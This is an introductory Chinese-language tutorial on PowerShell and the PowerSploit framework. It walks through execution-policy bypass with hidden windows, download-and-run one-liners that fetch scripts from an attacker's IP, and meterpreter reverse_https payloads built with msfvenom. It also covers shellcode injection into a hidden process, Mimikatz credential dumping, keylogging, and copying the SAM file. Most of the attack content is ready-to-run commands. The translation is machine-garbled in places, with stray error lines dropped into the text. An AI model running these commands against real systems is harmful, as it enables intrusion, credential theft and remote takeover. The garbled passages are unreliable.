本文《Powershell & Powersploit 入门》由armyzer0团队原创投稿安全脉搏,安全脉搏发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。 PowerShel…
本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。
PowerShell是一个命令行脚本环境,可以自动执行在Windows上运行的系统和应用程序管理。您可以将其视为命令行提示符cmd.exe或subversion的扩展。 Powershell需要支持.NET环境并支持.NET对象。可读,易于使用,可以是所有当前shell中的第一个。

目前有四个版本的PowerShell,分别为1.0,2.0,3.0和4.0。

关于安全脉冲的Powershell有很多文章,请看这里:https://www.com/archives/tag/powershell
PowerShell简介

PowerShell脚本
*本地权限绕过执行PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
*本地隐藏权限绕过执行脚本PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive-NoProfile -WindowStyle Hidden -File xxx.ps1
从对等方接收数据时失败
* Recon使用目标主机作为内部网信息检测的跳板
## Powersploit 模块应用程序
Invoke-Shellcode此模块可与MSF结合使用以获得意外结果,此处未对此进行介绍。
首先在目标主机上安装“Invoke-Shellcode”脚本。使用Get-Help +脚本名称查看如何使用它:
命令格式:
IEX(New-Object Net.WebClient).DownloadString('http://IP Adress/CodeExecutio
N /调用 - Shellcode.ps1' )

一:使用MSF中的reverse_https模块进行反弹,设置如下

最初在Invoke-Shellcode中使用以下命令来弹跳:
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.146.129 -Lport 4444 -Force
但是Powersploit更新到3.0, Invoke-Shellcode脚本没有Lhost和Lport参数,所以我们需要使用另一种方法来实现。
使用msfvenom生成powershell脚本。
Msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.110.129 LPORT=4444 -f powershell -o/var/www/html/test

IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/CodeExecution/Invoke-Shellcode.ps1')
IEX(New-Object Net.WebClient).DownloadString('http://192.168.110.129/test')
Invoke-Shellcode -Shellcode($ buf)

二:过程注入
首先创建一个隐藏进程:
启动过程 c: \ windows \ system32 \ notepad.exe -WindowStyle隐藏
使用Get-Process命令查看当前进程,记住刚刚创建的隐藏进程ID。

然后使用Invoke-Shellcode脚本进行进程注入
Invoke-Shellcode -ProcessID 2384 -Shellcode($ buf)

如果您的Powersploit是2.2版,则可以直接使用以下命令。
从对等方接收数据时失败
Invoke-Portscan -Hosts< IP Adress/Rangr> -Ports

Invoke-Mimikatz DUMP密码(请注意,此脚本需要以管理员权限运行)
Invoke-Mimikatz - DumpCreds也可以直接运行

Get-Keystrokes Keylogger
Get-Keystrokes -LogPath +<保存位置>

Invoke-NinjaCopy Universal Copy
Invoke-NinjaCopy -Path<要复制的文件> -LocalDestination<复制文件保存位置>
在windows主机上有一个数据库SAM文件,数据中有很多有价值的信息,普通的COPY命令无法复制,使用通用副本可以复制SAM文件

Invoke-ReverseDnsLookup DNS查询(似乎没用 - - !,我希望每个人都告诉我这个东西的用途是什么)
Invoke-ReverseDnsLookup -IpRange< IP_Address/Range>

Get-HttpStatus 网站目录检测(似乎没用)
Get-HttpStatus -Target< IP Address> +字典(如果你遇到HTTPS然后添加-UseSSL,在其他端口然后 -Port)

本文《Powershell & Powersploit 入门》由军队0队提交安全脉冲,并公布了安全脉冲。如果您需要转载,请先联系安全脉冲授权;请不要擅自转载。